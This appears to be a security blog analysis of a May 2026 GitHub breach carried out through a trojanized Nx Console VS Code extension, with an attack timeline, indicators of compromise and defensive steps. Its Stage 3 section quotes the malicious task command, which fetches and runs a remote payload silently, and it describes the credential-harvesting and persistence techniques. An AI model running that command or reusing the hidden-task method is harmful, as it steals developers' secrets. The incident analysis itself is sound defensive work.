On May 19, 2026, GitHub suffered one of the most significant security compromises in its history. A single trojanized Visual Studio Code extension led to the exfiltration of approximately 3,800 internal code repositories. While customer-hosted repositories and enterprise tenants remained untouched, the breach exposed proprietary source code and architectural blueprints of GitHub’s core platform—and it’s already sparked congressional scrutiny over national security implications.
This wasn’t an isolated incident. It was the culmination of “Wave Four”—a systematic supply chain offensive orchestrated by TeamPCP, a financially motivated threat actor that has spent 2026 methodically poisoning the developer ecosystem.
Here’s what happened, how the attack chain worked, and what organizations need to do right now. This analysis synthesizes reporting from Cybersecurity News, SecurityWeek, StepSecurity, and other security researchers tracking the incident.
The Adversary: TeamPCP’s Supply Chain Warfare Model
TeamPCP (tracked by Google Threat Intelligence as UNC6780) doesn’t operate like traditional threat actors. They’ve built an automated, scalable attack infrastructure specifically designed to compromise developers and propagate through the software supply chain.
Their primary weapon is Mini Shai-Hulud—a self-replicating worm first documented in 2025. The worm infiltrates developer environments, harvests CI/CD tokens and publishing credentials, then automatically injects backdoored code into downstream packages maintained by the victim. It’s a force multiplier: compromise one developer, poison dozens of packages.
TeamPCP has also established strategic partnerships with ransomware syndicates. They act as initial access brokers, harvesting secrets and developer credentials. Groups like Vect handle encryption and extortion. BreachForums provides the monetization platform. This specialization has made them extraordinarily effective.
The GitHub breach was the crown jewel of their May 2026 campaign—but it followed a series of successful compromises:
- May 12: TanStack, UiPath, Mistral AI, and OpenSearch hit via Mini Shai-Hulud. Over 160 npm and PyPI packages backdoored.
- May 14–15: OpenAI employee endpoints compromised through a poisoned IDE extension. Developer code-signing certificates stolen.
- May 19: Grafana Labs breached through a compromised TanStack npm token. Private GitHub repositories exfiltrated.
- May 19: Microsoft’s
durabletaskPyPI package poisoned (versions 1.4.1–1.4.3) with a multi-cloud infostealer and targeted disk wipers. - May 19–20: GitHub internal repositories exfiltrated through a trojanized VS Code extension.
Anatomy of the Attack: Four Stages to Compromise
The GitHub breach followed a highly structured multi-stage pipeline. Understanding each phase is critical for defensive engineering.
Stage 1: Token Harvesting
The attack began when a contributor’s personal access token was scraped during an earlier, separate supply chain incident. This token granted write access to the official nrwl/nx repository on GitHub, along with publishing credentials for the VS Code Marketplace (VSCE_PAT).
This highlights a fundamental problem: developer credentials persist across systems. A compromise in one ecosystem can cascade to others.
Stage 2: The Orphan Commit
At 03:18 UTC on May 18, 2026, the attacker used the stolen token to push an unsigned orphan commit to the nrwl/nx repository. The commit hash: 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.
Here’s what made this clever: orphan commits have zero parent links. They’re unreachable from any branch and invisible to standard monitoring tools. You can only fetch them if you know the exact 40-character SHA hash. The commit replaced the entire Nx monorepo with an empty structure containing just two files: a package.json and a 498 KB obfuscated payload named index.js.
The commit message was pure social engineering: “Don’t delete this commit before 24 hours or wiper activates.” A threat designed to delay security response.
Stage 3: Marketplace Poisoning
At 12:30 UTC on May 18, the attacker published version 18.95.0 of the Nx Console extension (nrwl.angular-console) to the VS Code Marketplace using the stolen VSCE_PAT. The extension was live for approximately 18 minutes on the Microsoft Marketplace and 36 minutes on Open VSX before maintainers pulled it.
That window was enough. Upon installation—or automatic background update—opening any workspace triggered the extension’s activate() entry point. This executed a silent VS Code Task named install-mcp-extension:
bunx --bun https://github.com/nrwl/nx/558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2/index.js -yThe -y flag auto-confirmed installation without prompting. The task’s focus parameter was set to false, preventing the terminal panel from revealing execution. From the developer’s perspective, nothing visible happened.
Stage 4: System Enumeration and Persistence
Once executed, the Bun-driven dropper performed anti-analysis checks—terminating immediately if the host had fewer than four CPU cores (a typical sandbox configuration) or if specific debug indicators were present.
If allowed to run, the malware launched parallel credential-harvesting operations targeting:
- SSH keys
- AWS metadata
- Kubernetes configurations
- HashiCorp Vault tokens
- 1Password vaults
- Active process memory (via
/proc/*/mem)
On macOS and Linux, it dropped a persistent Python backdoor named cat.py, registering a LaunchAgent (com.user.kitty-monitor.plist) to survive reboots. The backdoor polled the GitHub Search API hourly for commit messages containing the string “firedalazer”—a dead-drop mechanism. If a matching commit was signed with an embedded RSA key, the backdoor downloaded and executed the referenced payload.
The Wiper Element: Geopolitical Sabotage
Here’s where it gets darker. The compromised durabletask PyPI package (versions 1.4.1–1.4.3) delivered a second-stage payload targeting Linux hosts running Azure Durable Functions workloads. Beyond credential harvesting, it contained destructive wiper logic targeting filesystems on machines operating within Israeli and Iranian IP subnets.
This isn’t purely financial cybercrime. The geopolitical targeting suggests TeamPCP is either operating on behalf of a state actor or selling access to one. The infrastructure overlap—same C2 domains (check.git-service[.]com), same IP ranges (83.142.209.0/24)—confirms the VS Code campaign and PyPI worm share the same ancestry.
Underground Economics: The Source Code Auction
Rather than extorting GitHub directly, TeamPCP immediately moved to monetize on BreachForums. The listing followed a “single-buyer, no-negotiation” model:
“We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free.”
Initial offers started at $50,000. By May 20, active bidding had reached $95,000.
This approach—rapid monetization over prolonged extortion—reflects a mature understanding of corporate response capabilities. Large technology companies rarely pay ransoms, and the longer attackers hold stolen data, the more time defenders have to rotate credentials and mitigate damage.
The CISA Irony
In a twist that underscores how pervasive these vulnerabilities are, security researchers discovered an exposed public repository belonging to CISA during the same timeframe. The repository—ironically named “Private-CISA”—had been accessible for over six months and contained:
- Plain-text passwords
- Active Entra ID SAML certificates
- Raw AWS tokens
The exposure occurred because developer commits containing hardcoded secrets were being blocked by GitHub’s push protection. To bypass this friction, personnel deliberately disabled security scanning. The agency tasked with advising on developer credential hygiene failed at the same basics.
Indicators of Compromise: What to Hunt For
Security teams must audit environments for these specific indicators:
| Type | Indicator | Action |
|---|---|---|
| VS Code Extension | nrwl.angular-console v18.95.0 | Uninstall; revert to v18.100.0+ |
| Git Commit | 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 | Block checkout attempts in nrwl/nx |
| VS Code State | nxConsole.mcpExtensionInstalledSha | Query globalState database |
| File Path | ~/.local/share/kitty/cat.py | Terminate and delete |
| LaunchAgent | ~/Library/LaunchAgents/com.user.kitty-monitor.plist | Unload and delete |
| State File | /var/tmp/.gh_update_state | Presence indicates active execution |
| C2 Domain | check.git-service[.]com | Block outbound; monitor DNS |
| C2 Domain | t.m-kosche[.]com | Block outbound; monitor DNS |
Defensive Engineering: What Actually Works
Lock Down VS Code Extensions
Permissive marketplace access is a liability. Enforce a strict extension allowlist through enterprise device management:
{
"extensions.allowed": [
"ms-vscode.cpptools",
"ms-python.python",
"github.copilot"
]
}Additionally, restrict workspace task execution. Set git.openRepositoryInParentFolders appropriately and disable automated task execution without explicit consent.
Implement a Minimum-Age Policy
The Nx Console backdoor was live for under 20 minutes before removal. Organizations should deploy on-device agents enforcing a 48-hour publishing hold: any package, extension, or update published to public registries within the last 48 hours gets blocked, automatically falling back to the most recent known-safe version.
This delay neutralizes the immediate execution window threat actors require during zero-day campaigns.
Mandatory Audit Protocols
For potentially compromised endpoints:
Workstation Audit: Check active shell processes for the environment variable __DAEMONIZED=1. Review terminal processes that spawned elevated privilege commands.
Git Log Verification: Audit github.com/settings/security-log for unauthorized SSH key registrations, personal access token creations, or unexpected OAuth applications.
Workflow Integrity: Review all .github/workflows/ YAML definitions. Verify no unauthorized third-party actions are referenced. Any commit to high-impact repositories without a valid GPG signature requires isolation and inspection.
The Bigger Picture
The GitHub breach isn’t an anomaly—it’s a signal. Developer environments are now among the highest-value targets in enterprise security, yet they remain systematically under-governed. Developers have broad access to source code, cloud infrastructure, and deployment pipelines. Their local configurations are frequently unmonitored.
TeamPCP has built an industrialized system for exploiting this gap. Mini Shai-Hulud automates propagation. Strategic partnerships handle monetization. The attack surface keeps expanding as more organizations adopt complex dependency chains.
The uncomfortable truth: there is no perimeter anymore. Your security posture is only as strong as the weakest token in your dependency graph.
Audit your developer environments. Enforce extension allowlists. Implement publishing delays. Sign your commits. Because if you’re relying on the assumption that your developers won’t install a malicious VS Code extension, TeamPCP has already proven you wrong.